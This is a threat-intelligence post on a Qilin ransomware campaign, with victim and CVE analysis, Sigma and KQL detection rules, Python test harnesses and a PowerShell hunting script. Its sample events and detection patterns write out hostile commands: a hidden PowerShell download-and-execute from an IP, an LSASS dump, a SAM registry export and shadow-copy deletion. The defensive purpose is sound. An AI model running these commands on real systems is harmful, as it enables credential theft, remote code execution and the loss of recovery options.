
QILIN Ransomware Gang: 18 New Victims Posted — High-Volume Attacks on Business & Financial Sectors

Security Arsenal Team
May 24, 2026

  • Aliases: Agenda, Titan
  • RaaS Model: Ransomware-as-a-Service (RaaS) with an affiliate-driven model.
  • Typical Ransom Demands: Variable, ranging from $500k to multi-million dollars depending on victim revenue, strictly enforced via double extortion (data leak + encryption).
  • Initial Access Vectors: Qilin affiliates are versatile but currently heavily favor exploitation of internet-facing applications (e.g., ConnectWise ScreenConnect, SmarterMail, Microsoft Exchange) and valid credentials obtained via phishing. They also leverage vulnerable VPN appliances.
  • Double Extortion: Standard practice. Victims are given a short timeline to pay before data is published on the group's .onion leak site.
  • Average Dwell Time: 3–7 days. Qilin affiliates move laterally quickly once initial access is established, often disabling defenses within 24 hours of the breach.

Current Campaign Analysis

Sector Targeting: Based on the last 100 postings, Qilin has diversified significantly but maintains a heavy focus on Business Services (Alpert Slobin & Rubenstein, Global Retool Group, Porter W Yett, WNS Lowery) and Consumer Services. Notably, it has also hit critical-infrastructure-adjacent sectors such as Financial Services (ExpoCredit) and Technology (Semgrep).

Geographic Concentration:

  • Primary: United States (Sponseller Group, Semgrep, Snyder Packaging) and United Kingdom (Global Retool Group, Hamer Childs).
  • Secondary: Australia, New Zealand, Czech Republic, Austria.

Victim Profile: The victims range from mid-market enterprises (revenue $50M–$500M) to large entities. The inclusion of law firms (Alpert Slobin) and tech companies (Semgrep) suggests affiliates are specifically hunting for high-value intellectual property and sensitive client data to maximize extortion leverage.

Posting Frequency & Escalation: Qilin is maintaining a high tempo of operations, with 4–5 victims posted daily on average. The recent cluster (May 20–24) points to a concentrated exploitation wave, likely linked to the widespread availability of exploits for the CVEs listed below.

CVE Connection: There is a strong correlation between the recent victim surge and the exploitation of:

  • CVE-2024-1708 (ConnectWise ScreenConnect): A path traversal vulnerability that, chained with the CVE-2024-1709 authentication bypass (CVSS 10.0), yields unauthenticated remote code execution on the ScreenConnect server. This pairing is a primary vector for Qilin affiliates targeting managed service providers (MSPs) and business services, since one compromised ScreenConnect instance reaches every endpoint it manages.
  • SmarterMail Vulnerabilities (CVE-2025-52691, CVE-2026-23760): The targeting of legal and business services firms suggests email server exploitation is a significant entry point in this campaign.

Detection Engineering

The following detection rules and hunt queries are designed to identify the specific TTPs observed in Qilin's recent campaign, specifically focusing on the exploitation of internet-facing applications and lateral movement preparation.

Sigma Rules

YAML
---
title: Potential ConnectWise ScreenConnect Exploitation (CVE-2024-1708)
id: 4c775b9c-1f2e-4a9a-8b3c-1d2e3f4a5b6c
description: Detects requests to the ScreenConnect WebService.ashx endpoint whose query string carries a Host= parameter, the web-log pattern associated above with CVE-2024-1708 exploitation (chained in the wild with the CVE-2024-1709 authentication bypass). The endpoint is matched on cs-uri-stem and the parameter on cs-uri-query; matching both strings against the query string alone never fires on the path, and matching either string on its own makes a critical-level rule fire on any request carrying Host=.
author: Security Arsenal Research
date: 2026/05/24
modified: 2026/05/24
status: experimental
tags:
  - attack.initial_access
  - attack.t1190
  - cve.2024.1708
  - cve.2024.1709
logsource:
  category: web
detection:
  selection_uri:
    cs-uri-stem|contains: 'WebService.ashx'
  selection_query:
    cs-uri-query|contains: 'Host='
  condition: selection_uri and selection_query
falsepositives:
  - Legitimate administrative access
level: critical
---
title: SmarterMail Suspicious File Upload Activity (CVE-2025-52691)
id: d8e4f3a2-1b3c-4d5e-6f7a-8b9c0d1e2f3a
description: Detects potential exploitation of the SmarterMail unrestricted file upload vulnerability, a successful POST to mail.aspx whose query string names a server-side script (.aspx/.ashx) rather than an ordinary attachment.
author: Security Arsenal Research
date: 2026/05/24
status: experimental
tags:
  - attack.initial_access
  - attack.t1190
  - cve.2025.52691
logsource:
  category: web
detection:
  selection:
    cs-uri-stem|contains: '/mail.aspx'
    cs-method: POST
    cs-uri-query|contains:
      - '.aspx'
      - '.ashx'
  success_status:
    sc-status: 200
  condition: selection and success_status
falsepositives:
  - Legitimate user file attachments whose names end in .aspx or .ashx
level: high
---
title: Qilin Ransomware Pre-Encryption Shadow Copy Deletion
id: a1b2c3d4-5e6f-7a8b-9c0d-1e2f3a4b5c6d
description: Detects commands used by Qilin affiliates to delete Volume Shadow Copies to prevent recovery.
author: Security Arsenal Research
date: 2026/05/24
status: experimental
tags:
  - attack.impact
  - attack.t1490
logsource:
  category: process_creation
detection:
  selection:
    Image|endswith:
      - '\vssadmin.exe'
      - '\wmic.exe'
    CommandLine|contains:
      - 'delete shadows'
      - 'shadowcopy delete'
  condition: selection
falsepositives:
  - System administrator maintenance
level: critical
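
As an added example (not code from the original advisory or from Security Arsenal), the following Python applies the two web-log rules above to constructed IIS W3C extended log lines, so the stem/query/method/status logic can be checked offline before the Sigma is deployed. It assumes IIS-style field names; the endpoint paths, hostnames and IP addresses in the sample are invented, and `parse_w3c`, `run_rules` and the rule functions are names chosen here.

```python
"""Added example, not code from the original advisory: evaluate the two
web-log Sigma rules above against constructed IIS W3C extended log lines.

Field names follow the W3C/IIS convention the rules use (cs-method,
cs-uri-stem, cs-uri-query, sc-status). Sigma's `contains` is
case-insensitive, so the helper lower-cases both sides. The endpoint
paths, hostnames and IP addresses in the sample are illustrative.
"""
from typing import Iterator

# Constructed sample log (not captured traffic). IIS writes one request per
# line, space-separated, with a #Fields header naming the columns.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2026-05-21 02:14:07 10.0.0.5 POST /Services/WebService.ashx Host=relay.example.net 443 - 203.0.113.9 python-requests/2.31 200
2026-05-21 02:15:31 10.0.0.5 GET /Host - 443 admin 198.51.100.4 Mozilla/5.0 200
2026-05-21 02:16:02 10.0.0.5 GET /App_Themes/Default/Host.css Host=relay.example.net 443 - 198.51.100.4 Mozilla/5.0 200
2026-05-21 03:40:11 10.0.0.7 POST /interface/mail.aspx file=shell.aspx 443 jdoe 203.0.113.9 curl/8.4.0 200
2026-05-21 03:41:58 10.0.0.7 POST /interface/mail.aspx file=shell.aspx 443 jdoe 203.0.113.9 curl/8.4.0 500
2026-05-21 03:42:20 10.0.0.7 POST /interface/mail.aspx file=report.pdf 443 jdoe 198.51.100.4 Mozilla/5.0 200
"""


def parse_w3c(text: str) -> Iterator[dict]:
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # header is re-emitted on log rotation
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()                  # IIS encodes embedded spaces as '+', so split() is safe
        if fields is None or len(values) != len(fields):
            continue                           # no header yet or malformed line: skip, don't guess
        yield dict(zip(fields, values))


def contains(value: str, needle: str) -> bool:
    """Sigma `contains`: case-insensitive substring match ('-' in IIS means empty)."""
    return needle.lower() in value.lower()


def screenconnect_rule(ev: dict) -> bool:
    """Rule 1: the WebService.ashx endpoint (path) requested with a Host= parameter (query)."""
    return (contains(ev.get("cs-uri-stem", ""), "WebService.ashx")
            and contains(ev.get("cs-uri-query", ""), "Host="))


def smartermail_rule(ev: dict) -> bool:
    """Rule 2: successful POST to mail.aspx whose query names a server-side script."""
    return (ev.get("cs-method", "").upper() == "POST"
            and contains(ev.get("cs-uri-stem", ""), "/mail.aspx")
            and any(contains(ev.get("cs-uri-query", ""), ext) for ext in (".aspx", ".ashx"))
            and ev.get("sc-status") == "200")


RULES = {
    "ScreenConnect CVE-2024-1708": screenconnect_rule,
    "SmarterMail CVE-2025-52691": smartermail_rule,
}


def run_rules(text: str) -> list[tuple[str, str, str]]:
    """Return (rule name, client IP, request) for every line a rule matches."""
    hits = []
    for ev in parse_w3c(text):
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, ev["c-ip"],
                             f"{ev['cs-method']} {ev['cs-uri-stem']}?{ev['cs-uri-query']}"))
    return hits


if __name__ == "__main__":
    for name, ip, request in run_rules(SAMPLE_LOG):
        print(f"[{name}] {ip} {request}")
```

Two of the six sample lines fire: the `WebService.ashx` POST and the `.aspx` upload that returned 200. The stylesheet request that merely carries `Host=` in its query string and the failed (500) upload do not, which is the behaviour the stem-versus-query split and the status clause are there to guarantee.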

KQL Hunt Query (Microsoft Sentinel)

Hunt for lateral movement and credential dumping attempts often seen prior to Qilin encryption.

KQL — Microsoft Sentinel / Defender
let TimeFrame = 1h;   // widen (e.g. 7d) for a retrospective hunt
DeviceProcessEvents
| where Timestamp > ago(TimeFrame)
// Look for tools used for lateral movement and recon (FileName is the executable-name column in this table)
| where FileName in~ ("powershell.exe", "cmd.exe", "powershell_ise.exe", "wmic.exe", "psexec.exe", "psexec64.exe", "procdump.exe", "rundll32.exe")
// Filter for suspicious arguments associated with the Qilin playbook
// ('has' is a case-insensitive whole-term match, so "lsass" also catches lsass.dmp but not a longer token containing it)
| where ProcessCommandLine has "New-Object" or
    ProcessCommandLine has "DownloadString" or
    ProcessCommandLine has "IEX" or
    ProcessCommandLine has "reg save" or
    ProcessCommandLine has "lsass"
// Exclude common admin activity (tuning required; this also drops commands an interactive RDP user launches from Explorer)
| where InitiatingProcessFileName !in~ ("explorer.exe", "services.exe")
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName, FolderPath
| order by Timestamp desc
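
As an added example (not code from the original advisory or from Security Arsenal), the following Python runs the shadow-copy Sigma rule and the KQL hunt's where-clauses over constructed process-creation events, so the matching semantics can be checked offline. It approximates KQL `has` as a whole-term match and Sigma `contains`/`endswith` as case-insensitive substring matches; the device names, account names, PID, paths and attacker IP are invented, and `kql_has`, `kql_hunt` and `triage` are names chosen here.

```python
"""Added example, not code from the original advisory: run the shadow-copy
Sigma rule and the KQL hunt's where-clauses above over constructed
process-creation events so the logic can be checked offline.

Field names follow DeviceProcessEvents. KQL `has` is a case-insensitive
whole-term match, approximated here by tokenising on runs of ASCII letters,
digits and underscore; Sigma `contains`/`endswith` are case-insensitive
substring matches. Hostnames, accounts, PIDs, paths and the IP are invented.
"""
import re

TERM = re.compile(r"[0-9A-Za-z_]+")


def kql_has(haystack: str, needle: str) -> bool:
    """Approximate KQL `has`: the needle's term(s) appear as a contiguous run of
    whole terms in the haystack. 'lsass' matches 'lsass.dmp' (separate term)
    but 'IEX' does not match 'PIEXporter' (inside a longer term)."""
    hay = [t.lower() for t in TERM.findall(haystack)]
    need = [t.lower() for t in TERM.findall(needle)]
    if not need:
        return False
    return any(hay[i:i + len(need)] == need for i in range(len(hay) - len(need) + 1))


def _ev(ts, file, cmd, parent, device="fs01", account="svc_backup"):
    """Build one constructed DeviceProcessEvents-style row (not telemetry)."""
    return {"Timestamp": ts, "DeviceName": device, "AccountName": account,
            "FileName": file, "FolderPath": r"C:\Windows\System32" + "\\" + file,
            "ProcessCommandLine": cmd, "InitiatingProcessFileName": parent}


EVENTS = [
    _ev("2026-05-22T01:02:03Z", "vssadmin.exe", "vssadmin.exe Delete Shadows /All /Quiet", "cmd.exe"),
    _ev("2026-05-22T01:02:09Z", "wmic.exe", "wmic shadowcopy delete", "powershell.exe"),
    _ev("2026-05-22T00:41:17Z", "powershell.exe",
        "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')",
        "winword.exe", device="ws-legal-07", account="jdoe"),
    _ev("2026-05-22T00:52:40Z", "rundll32.exe",
        r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Windows\Temp\lsass.dmp full", "cmd.exe"),
    _ev("2026-05-22T00:55:02Z", "cmd.exe", r"cmd.exe /c reg save HKLM\SAM C:\Temp\sam.hiv", "explorer.exe"),
    _ev("2026-05-22T00:58:30Z", "cmd.exe", r"cmd.exe /c C:\Tools\PIEXporter.exe /run", "cmd.exe"),
]

HUNT_PROCESSES = {"powershell.exe", "cmd.exe", "powershell_ise.exe", "wmic.exe",
                  "psexec.exe", "psexec64.exe", "procdump.exe", "rundll32.exe"}
HUNT_TERMS = ("New-Object", "DownloadString", "IEX", "reg save", "lsass")
EXCLUDED_PARENTS = {"explorer.exe", "services.exe"}


def shadow_copy_deletion(ev: dict) -> bool:
    """Sigma rule 3: vssadmin/wmic deleting Volume Shadow Copies."""
    image = ev["FolderPath"].lower()
    cmd = ev["ProcessCommandLine"].lower()
    return (image.endswith(("\\vssadmin.exe", "\\wmic.exe"))
            and ("delete shadows" in cmd or "shadowcopy delete" in cmd))


def kql_hunt(events: list[dict]) -> list[dict]:
    """The KQL hunt's three where-clauses (time window omitted), newest first."""
    hits = [ev for ev in events
            if ev["FileName"].lower() in HUNT_PROCESSES
            and any(kql_has(ev["ProcessCommandLine"], term) for term in HUNT_TERMS)
            and ev["InitiatingProcessFileName"].lower() not in EXCLUDED_PARENTS]
    return sorted(hits, key=lambda e: e["Timestamp"], reverse=True)


def triage(events: list[dict]) -> dict[str, list[str]]:
    """Bucket events for the IR checklist: shadow-copy deletion means encryption
    is minutes away and outranks the slower-burn hunt hits."""
    fmt = lambda e: f"{e['DeviceName']} ({e['AccountName']}): {e['ProcessCommandLine']}"
    return {"imminent": [fmt(e) for e in events if shadow_copy_deletion(e)],
            "hunt": [fmt(e) for e in kql_hunt(events)]}


if __name__ == "__main__":
    for bucket, lines in triage(EVENTS).items():
        print(f"== {bucket} ==")
        for line in lines:
            print(" ", line)
```

Worth noticing in the sample: the `reg save HKLM\SAM` event is dropped by the parent-process exclusion because it was launched from `explorer.exe`, which is exactly how a command typed in an interactive RDP session looks. When tuning the exclusion, narrow it by account or by working hours rather than by parent alone. The `PIEXporter.exe` line shows the other direction: `has "IEX"` stays quiet on a longer token that merely contains the letters, where a `contains` clause would have fired.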

Rapid-Response Hardening Script

Use this PowerShell script to enumerate scheduled tasks registered in the last 7 days (persistence check), list active RDP sessions and RDP/WinRM listeners that Qilin uses for lateral movement, and pull recent Volume Shadow Copy Service events. Run it elevated on the suspected host.

PowerShell
# Qilin Persistence & Exposure Hunt (run elevated)
Write-Host "Checking for Scheduled Tasks registered in last 7 days..." -ForegroundColor Cyan
$dateThreshold = (Get-Date).AddDays(-7)
# Date is a string taken from the task XML (often empty for built-in tasks), so cast it before comparing;
# Actions (plural) holds the executable and arguments, there is no Action property.
Get-ScheduledTask |
    Where-Object { $_.Date -and ([datetime]$_.Date) -gt $dateThreshold } |
    Select-Object TaskName, TaskPath, Date, Author,
        @{ Name = 'Action'; Expression = { ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; ' } } |
    Format-Table -Wrap

Write-Host "Checking active RDP sessions..." -ForegroundColor Cyan
query session

Write-Host "Checking for RDP/WinRM listeners (3389, 5985, 5986)..." -ForegroundColor Cyan
Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue |
    Where-Object { $_.LocalPort -in 3389, 5985, 5986 } |
    Select-Object LocalAddress, LocalPort, OwningProcess

Write-Host "Checking for recent Volume Shadow Copy Service events..." -ForegroundColor Cyan
Get-WinEvent -FilterHashtable @{LogName='System'; ProviderName='VSS'; StartTime=$dateThreshold} -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, LevelDisplayName, Message | Format-Table -Wrap

Write-Host "Hunt complete. Review the 'Author' and 'Action' fields of new Scheduled Tasks for unknown accounts or unexpected binaries." -ForegroundColor Yellow


Incident Response Priorities

Based on Qilin's "fast and loud" playbook:

1.  **T-Minus Detection Checklist**:
    *   **Check IIS/Mail Logs**: Immediate grep for `WebService.ashx` (ConnectWise) and `mail.aspx` anomalous POST requests.
    *   **PowerShell Logs**: Hunt for `DownloadString` or `IEX` commands originating from non-admin accounts.
    *   **Shadow Copies**: If `vssadmin.exe` is found running with `delete` arguments, encryption is imminent (minutes away).

2.  **Critical Assets for Exfiltration**:
    *   Qilin targets **Legal** and **Financial** data. Prioritize forensic review on file servers containing client PII, M&A data, and financial spreadsheets.

3.  **Containment Actions**:
    *   **Isolate**: Disconnect the compromised server from the network immediately; do not shut down (preserve RAM).
    *   **Reset**: Force reset credentials for service accounts, specifically those with access to the exploited application (e.g., Exchange, ConnectWise).
    *   **Block Firewall**: Block outbound traffic to known Tor nodes and non-standard ports on workstations immediately.

Hardening Recommendations

**Immediate (24h)**:
*   **Patch CVE-2024-1708 / CVE-2024-1709 (ConnectWise)**: If using ScreenConnect, apply the vendor patch (23.9.8 or later) immediately, or restrict access to the `/Host` path via firewall/WAF until patched. Treat any instance that was internet-exposed and unpatched as potentially compromised and review it before trusting it again.
*   **Patch SmarterMail (CVE-2025-52691)**: Update to the latest secure version. Disable anonymous file uploads if not required.
*   **Disable RDP**: Close TCP 3389 from the internet. Enforce MFA for all remote access immediately.

**Short-term (2 weeks)**:
*   **Network Segmentation**: Isolate business-critical file servers from internet-facing web servers. Qilin moves laterally from the web entry point to the file server.
*   **Endpoint Detection**: Deploy behavioral rules specifically targeting PowerShell obfuscation and unusual process trees (e.g., Word spawning PowerShell spawning cmd.exe).
*   **Email Hygiene**: Implement strict filtering for macros and suspicious links, as secondary infection vectors remain active.
